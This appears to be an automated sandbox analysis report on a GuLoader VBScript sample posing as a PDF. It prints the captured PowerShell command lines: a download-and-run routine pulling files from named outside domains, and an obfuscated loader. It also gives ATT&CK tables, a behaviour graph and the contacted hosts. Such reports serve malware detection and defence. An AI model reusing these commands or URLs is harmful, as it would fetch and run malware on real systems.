            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command function downloadandrun([string]$url, [string]$destination) { invoke-webrequest -uri $url -outfile $destination ; start-process -filepath $destination -wait };downloadandrun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'c:\users\public\tk4f2qxkb.vbs';downloadandrun -url 'https://www.fornid.com/ab/list%20of%20required%20items.xlsx' -destination 'c:\users\public\bsxhli2ob.xlsx'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$columbusgs='reallnningernes';;$cares='doegling';;$novela='dyrkere55';;$pigesjovetridiocyte='teister';;$peacefuller=$host.name;function multiplum($pousserer){if ($peacefuller) {$exitskiltes=2} for ($pigesjovet=$exitskiltes;;$pigesjovet+=3){if(!$pousserer[$pigesjovet]){cls;break }$vandstande+=$pousserer[$pigesjovet];$fiskeinteressernes='unmoralises'}$vandstande}function unchanneled($pigesjovetmmunotoxin){ .($instrumentalis) ($pigesjovetmmunotoxin)}$kvabserne=multiplum 'spnoreactdu.d.w';$kvabserne+=multiplum 'ave bpscmaldeic eslncet';$bugfish=multiplum ' fm.jod.zbeilalaslf a i/';$exosperm=multiplum 'optstlsksra1 .2';$bagprojektion121='go[.an,oesltad.ossk e,ar,av aigrc,fe op poslimantet.rm raddnp,a ugdae,lrv.].j:,u: ,ss emucceuryrr.iretk.ybap nru o tt uohect oanl h= .$ serox lo ssmip nevarvam';$bugfish+=multiplum 'ar5r .kn0.o (gjwfoip nm.d robewdrs , vonstts rv1un0re.dr0v,;t utwstiann,e6p,4br; s sux 6 n4en;t .urd vst: e1pr3co1r .d.0s )fl bag eer c gkpaoen/ja2 s0 u1fu0 c0l,1 l0ha1wa of .imirmlefufu osuxfo/ m1m 3.k1ny.sn0';$whitefishery=multiplum ',iucis yehurve- oaunggheibn rt';$knysten=multiplum 'vah it ,t,tp.is s:fr/ec/,rwmewsew,i..epguubenspef.eretsl.,gas e e/hei.nt s/ankkoo gn utjvrpeascs nt nrpai .g tsh.l mses o n>n.hu t t apcosco: s/on/ rwl,wblw u.prf vtbesh e n hggei incaefiej rfrs t. .cv o lmp /gei itcl/mikcaoorn otemranaa stotp r,mibyg,itve.hamb s eo';$tikronesedler=multiplum 'sm>';$instrumentalis=multiplum 'spispe vx';$ribboned46='treater';$fabriksvarerne='\pharmacists201.str';unchanneled (multiplum 'un$chg yl uo .bgea vlti:sisvsab l atdvi cnbte rs t=,n$ e hn.ava.:graovp ,psrd cas,tr ahn+ t$unfprasebudrmai kbys evreainra e krran oe');unchanneled (multiplum 'af$spgcal aoi bela rlro:,as jinus s.jkseegim ri.lk,pkvoelilpa= d$d.ksans.yhastit emenst. s .pboldiivit,a(as$u t rienks,r uo.anfeeexsbre adkolo.e.rrsy)');unchanneled (multiplum $bagprojektion121);$knysten=$sjuskemikkel[0];$thyreoid=(multiplum ' l$p gn,lslof,bhaapelov:pei.on v aapoltoired fet,f odaraasn i akm.r gilend g u=enn oe iw -reo .bknjnue dcput,c a s rylasi,tbredrm a.h.$ ak vnoabob es e pr hnkae');unchanneled ($thyreoid);unchanneled (multiplum 'pr$ pisan v aa l ,i ad ecofthobirbist,irek or i fnpegun.m hprecoa dafe drslss [by$ wlah fi btf ehef diads ohcoearr yio]ce=w $tobtiup.g yf ,if sunh');$reedmaker=multiplum ' r$raiusn rvsea,al ai,mdfleafft ofirk sglikok prv,iavnfrg a.sedjaocew anr,lt.ogra tdscfv i nlane (de$kakchnplyflsklta,eq,nm.,in$ ap ge dnmosmiitiozankvs,macildrd iesurno)';$pensionsalder=$saltines;unchanneled (multiplum 'eg$megf lteojabriar.lal:,bk tih dcedbeif.es sma=ga(get he,rsditsa-adpstashtgehbe ,a$kop telan,esb,i o fn smaaralbedpoeserpa)');while (!$kiddies) {unchanneled (multiplum 'hy$anginlp oelbima flr,: fuu dsegnoatevtuesp=ar$ np,kifogdreaks ajmeoejvr ebetudn ut aecarhui umsms alrus nbristnh.gph8') ;unchanneled $ree
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$columbusgs='reallnningernes';;$cares='doegling';;$novela='dyrkere55';;$pigesjovetridiocyte='teister';;$peacefuller=$host.name;function multiplum($pousserer){if ($peacefuller) {$exitskiltes=2} for ($pigesjovet=$exitskiltes;;$pigesjovet+=3){if(!$pousserer[$pigesjovet]){cls;break }$vandstande+=$pousserer[$pigesjovet];$fiskeinteressernes='unmoralises'}$vandstande}function unchanneled($pigesjovetmmunotoxin){ .($instrumentalis) ($pigesjovetmmunotoxin)}$kvabserne=multiplum 'spnoreactdu.d.w';$kvabserne+=multiplum 'ave bpscmaldeic eslncet';$bugfish=multiplum ' fm.jod.zbeilalaslf a i/';$exosperm=multiplum 'optstlsksra1 .2';$bagprojektion121='go[.an,oesltad.ossk e,ar,av aigrc,fe op poslimantet.rm raddnp,a ugdae,lrv.].j:,u: ,ss emucceuryrr.iretk.ybap nru o tt uohect oanl h= .$ serox lo ssmip nevarvam';$bugfish+=multiplum 'ar5r .kn0.o (gjwfoip nm.d robewdrs , vonstts rv1un0re.dr0v,;t utwstiann,e6p,4br; s sux 6 n4en;t .urd vst: e1pr3co1r .d.0s )fl bag eer c gkpaoen/ja2 s0 u1fu0 c0l,1 l0ha1wa of .imirmlefufu osuxfo/ m1m 3.k1ny.sn0';$whitefishery=multiplum ',iucis yehurve- oaunggheibn rt';$knysten=multiplum 'vah it ,t,tp.is s:fr/ec/,rwmewsew,i..epguubenspef.eretsl.,gas e e/hei.nt s/ankkoo gn utjvrpeascs nt nrpai .g tsh.l mses o n>n.hu t t apcosco: s/on/ rwl,wblw u.prf vtbesh e n hggei incaefiej rfrs t. .cv o lmp /gei itcl/mikcaoorn otemranaa stotp r,mibyg,itve.hamb s eo';$tikronesedler=multiplum 'sm>';$instrumentalis=multiplum 'spispe vx';$ribboned46='treater';$fabriksvarerne='\pharmacists201.str';unchanneled (multiplum 'un$chg yl uo .bgea vlti:sisvsab l atdvi cnbte rs t=,n$ e hn.ava.:graovp ,psrd cas,tr ahn+ t$unfprasebudrmai kbys evreainra e krran oe');unchanneled (multiplum 'af$spgcal aoi bela rlro:,as jinus s.jkseegim ri.lk,pkvoelilpa= d$d.ksans.yhastit emenst. s .pboldiivit,a(as$u t rienks,r uo.anfeeexsbre adkolo.e.rrsy)');unchanneled (multiplum $bagprojektion121);$knysten=$sjuskemikkel[0];$thyreoid=(multiplum ' l$p gn,lslof,bhaapelov:pei.on v aapoltoired fet,f odaraasn i akm.r gilend g u=enn oe iw -reo .bknjnue dcput,c a s rylasi,tbredrm a.h.$ ak vnoabob es e pr hnkae');unchanneled ($thyreoid);unchanneled (multiplum 'pr$ pisan v aa l ,i ad ecofthobirbist,irek or i fnpegun.m hprecoa dafe drslss [by$ wlah fi btf ehef diads ohcoearr yio]ce=w $tobtiup.g yf ,if sunh');$reedmaker=multiplum ' r$raiusn rvsea,al ai,mdfleafft ofirk sglikok prv,iavnfrg a.sedjaocew anr,lt.ogra tdscfv i nlane (de$kakchnplyflsklta,eq,nm.,in$ ap ge dnmosmiitiozankvs,macildrd iesurno)';$pensionsalder=$saltines;unchanneled (multiplum 'eg$megf lteojabriar.lal:,bk tih dcedbeif.es sma=ga(get he,rsditsa-adpstashtgehbe ,a$kop telan,esb,i o fn smaaralbedpoeserpa)');while (!$kiddies) {unchanneled (multiplum 'hy$anginlp oelbima flr,: fuu dsegnoatevtuesp=ar$ np,kifogdreaks ajmeoejvr ebetudn ut aecarhui umsms alrus nbristnh.gph8') ;unchanneled $ree
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command function downloadandrun([string]$url, [string]$destination) { invoke-webrequest -uri $url -outfile $destination ; start-process -filepath $destination -wait };downloadandrun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'c:\users\public\tk4f2qxkb.vbs';downloadandrun -url 'https://www.fornid.com/ab/list%20of%20required%20items.xlsx' -destination 'c:\users\public\bsxhli2ob.xlsx'Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$columbusgs='reallnningernes';;$cares='doegling';;$novela='dyrkere55';;$pigesjovetridiocyte='teister';;$peacefuller=$host.name;function multiplum($pousserer){if ($peacefuller) {$exitskiltes=2} for ($pigesjovet=$exitskiltes;;$pigesjovet+=3){if(!$pousserer[$pigesjovet]){cls;break }$vandstande+=$pousserer[$pigesjovet];$fiskeinteressernes='unmoralises'}$vandstande}function unchanneled($pigesjovetmmunotoxin){ .($instrumentalis) ($pigesjovetmmunotoxin)}$kvabserne=multiplum 'spnoreactdu.d.w';$kvabserne+=multiplum 'ave bpscmaldeic eslncet';$bugfish=multiplum ' fm.jod.zbeilalaslf a i/';$exosperm=multiplum 'optstlsksra1 .2';$bagprojektion121='go[.an,oesltad.ossk e,ar,av aigrc,fe op poslimantet.rm raddnp,a ugdae,lrv.].j:,u: ,ss emucceuryrr.iretk.ybap nru o tt uohect oanl h= .$ serox lo ssmip nevarvam';$bugfish+=multiplum 'ar5r .kn0.o (gjwfoip nm.d robewdrs , vonstts rv1un0re.dr0v,;t utwstiann,e6p,4br; s sux 6 n4en;t .urd vst: e1pr3co1r .d.0s )fl bag eer c gkpaoen/ja2 s0 u1fu0 c0l,1 l0ha1wa of .imirmlefufu osuxfo/ m1m 3.k1ny.sn0';$whitefishery=multiplum ',iucis yehurve- oaunggheibn rt';$knysten=multiplum 'vah it ,t,tp.is s:fr/ec/,rwmewsew,i..epguubenspef.eretsl.,gas e e/hei.nt s/ankkoo gn utjvrpeascs nt nrpai .g tsh.l mses o n>n.hu t t apcosco: s/on/ rwl,wblw u.prf vtbesh e n hggei incaefiej rfrs t. .cv o lmp /gei itcl/mikcaoorn otemranaa stotp r,mibyg,itve.hamb s eo';$tikronesedler=multiplum 'sm>';$instrumentalis=multiplum 'spispe vx';$ribboned46='treater';$fabriksvarerne='\pharmacists201.str';unchanneled (multiplum 'un$chg yl uo .bgea vlti:sisvsab l atdvi cnbte rs t=,n$ e hn.ava.:graovp ,psrd cas,tr ahn+ t$unfprasebudrmai kbys evreainra e krran oe');unchanneled (multiplum 'af$spgcal aoi bela rlro:,as jinus s.jkseegim ri.lk,pkvoelilpa= d$d.ksans.yhastit emenst. s .pboldiivit,a(as$u t rienks,r uo.anfeeexsbre adkolo.e.rrsy)');unchanneled (multiplum $bagprojektion121);$knysten=$sjuskemikkel[0];$thyreoid=(multiplum ' l$p gn,lslof,bhaapelov:pei.on v aapoltoired fet,f odaraasn i akm.r gilend g u=enn oe iw -reo .bknjnue dcput,c a s rylasi,tbredrm a.h.$ ak vnoabob es e pr hnkae');unchanneled ($thyreoid);unchanneled (multiplum 'pr$ pisan v aa l ,i ad ecofthobirbist,irek or i fnpegun.m hprecoa dafe drslss [by$ wlah fi btf ehef diads ohcoearr yio]ce=w $tobtiup.g yf ,if sunh');$reedmaker=multiplum ' r$raiusn rvsea,al ai,mdfleafft ofirk sglikok prv,iavnfrg a.sedjaocew anr,lt.ogra tdscfv i nlane (de$kakchnplyflsklta,eq,nm.,in$ ap ge dnmosmiitiozankvs,macildrd iesurno)';$pensionsalder=$saltines;unchanneled (multiplum 'eg$megf lteojabriar.lal:,bk tih dcedbeif.es sma=ga(get he,rsditsa-adpstashtgehbe ,a$kop telan,esb,i o fn smaaralbedpoeserpa)');while (!$kiddies) {unchanneled (multiplum 'hy$anginlp oelbima flr,: fuu dsegnoatevtuesp=ar$ np,kifogdreaks ajmeoejvr ebetudn ut aecarhui umsms alrus nbristnh.gph8') ;unchanneled $reeJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information211
            Scripting
            Valid Accounts11
            Windows Management Instrumentation
            211
            Scripting
            11
            Process Injection
            11
            Masquerading
            OS Credential Dumping111
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            131
            Virtualization/Sandbox Evasion
            LSASS Memory1
            Process Discovery
            Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Exploitation for Client Execution
            Logon Script (Windows)Logon Script (Windows)11
            Process Injection
            Security Account Manager131
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell
            Login HookLogin Hook1
            Obfuscated Files or Information
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Software Packing
            LSA Secrets1
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials124
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571488 Sample: List of required items pdf.vbs Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 49 www.puneet.ae 2->49 51 www.astenterprises.com.pk 2->51 53 8 other IPs or domains 2->53 69 Malicious sample detected (through community Yara rule) 2->69 71 Yara detected GuLoader 2->71 73 Yara detected Powershell download and execute 2->73 75 7 other signatures 2->75 10 wscript.exe 1 2->10         started        13 powershell.exe 15 2->13         started        15 svchost.exe 1 1 2->15         started        signatures3 process4 dnsIp5 83 VBScript performs obfuscated calls to suspicious functions 10->83 85 Suspicious powershell command line found 10->85 87 Wscript starts Powershell (via cmd or directly) 10->87 91 2 other signatures 10->91 18 powershell.exe 19 19 10->18         started        89 Found suspicious powershell code related to unpacking or dynamic code loading 13->89 23 conhost.exe 13->23         started        65 127.0.0.1 unknown unknown 15->65 signatures6 process7 dnsIp8 55 astenterprises.com.pk 107.161.23.150, 443, 49705 RAMNODEUS United States 18->55 57 fornid.com 93.95.216.175, 443, 49710 SERVERPLAN-ASIT Italy 18->57 45 C:\Users\Public\tk4f2qxkb.vbs, ASCII 18->45 dropped 47 C:\Users\Public\bsxhli2ob.xlsx, Microsoft 18->47 dropped 77 Found suspicious powershell code related to unpacking or dynamic code loading 18->77 25 wscript.exe 1 18->25         started        28 EXCEL.EXE 73 70 18->28         started        31 conhost.exe 18->31         started        file9 signatures10 process11 dnsIp12 79 Suspicious powershell command line found 25->79 81 Wscript starts Powershell (via cmd or directly) 25->81 33 WMIC.exe 1 25->33         started        36 powershell.exe 18 25->36         started        61 s-part-0035.t-0009.t-msedge.net 13.107.246.63, 443, 49725, 49726 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 28->61 63 s-0005.s-dc-msedge.net 52.113.195.132, 443, 49716 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 28->63 39 splwow64.exe 28->39         started        signatures13 process14 dnsIp15 67 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 33->67 41 conhost.exe 33->41         started        59 puneet.ae 209.124.66.28, 443, 49707 A2HOSTINGUS United States 36->59 43 conhost.exe 36->43         started        signatures16 process17

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            List of required items pdf.vbs0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://www.puneet.ae/it/Kontrastrigt.mso0%Avira URL Cloudsafe
            https://www.fornid.com/ab/List%20of%20required%20items.xlsx0%Avira URL Cloudsafe
            https://www.astenterprises.com.pk0%Avira URL Cloudsafe
            https://www.ftsengineers.com/it/Kontrastrigt.mso00%Avira URL Cloudsafe
            http://astenterprises.com.pk0%Avira URL Cloudsafe
            https://www.fornid.com/ab/List0%Avira URL Cloudsafe
            http://www.astenterprises.com.pk0%Avira URL Cloudsafe
            https://www.astenterprises.com.pk/it/it.vbs0%Avira URL Cloudsafe
            http://www.puneet.ae0%Avira URL Cloudsafe
            http://puneet.ae0%Avira URL Cloudsafe
            https://www.ftsengineers.com/it/Kontrastrigt.mso0%Avira URL Cloudsafe
            https://www.puneet.ae0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            199.232.210.172
            truefalse
              high
              puneet.ae
              209.124.66.28
              truefalse
                unknown
                astenterprises.com.pk
                107.161.23.150
                truetrue
                  unknown
                  fornid.com
                  93.95.216.175
                  truefalse
                    high
                    s-0005.s-dc-msedge.net
                    52.113.195.132
                    truefalse
                      high
                      s-part-0035.t-0009.t-msedge.net
                      13.107.246.63
                      truefalse
                        high
                        www.puneet.ae
                        unknown
                        unknowntrue
                          unknown
                          www.fornid.com
                          unknown
                          unknownfalse
                            high
                            www.astenterprises.com.pk
                            unknown
                            unknowntrue
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              https://www.puneet.ae/it/Kontrastrigt.msofalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.fornid.com/ab/List%20of%20required%20items.xlsxtrue
                              • Avira URL Cloud: safe
                              unknown
                              https://www.astenterprises.com.pk/it/it.vbstrue
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2836854047.000002DDF05F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2836854047.000002DDF04B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2756383968.000002DDE1E7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1713743041.00000263F1724000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.1667958420.00000263E18D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.1667958420.00000263E18D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://go.micropowershell.exe, 00000002.00000002.2756383968.000002DDE106C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1667958420.00000263E2BD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
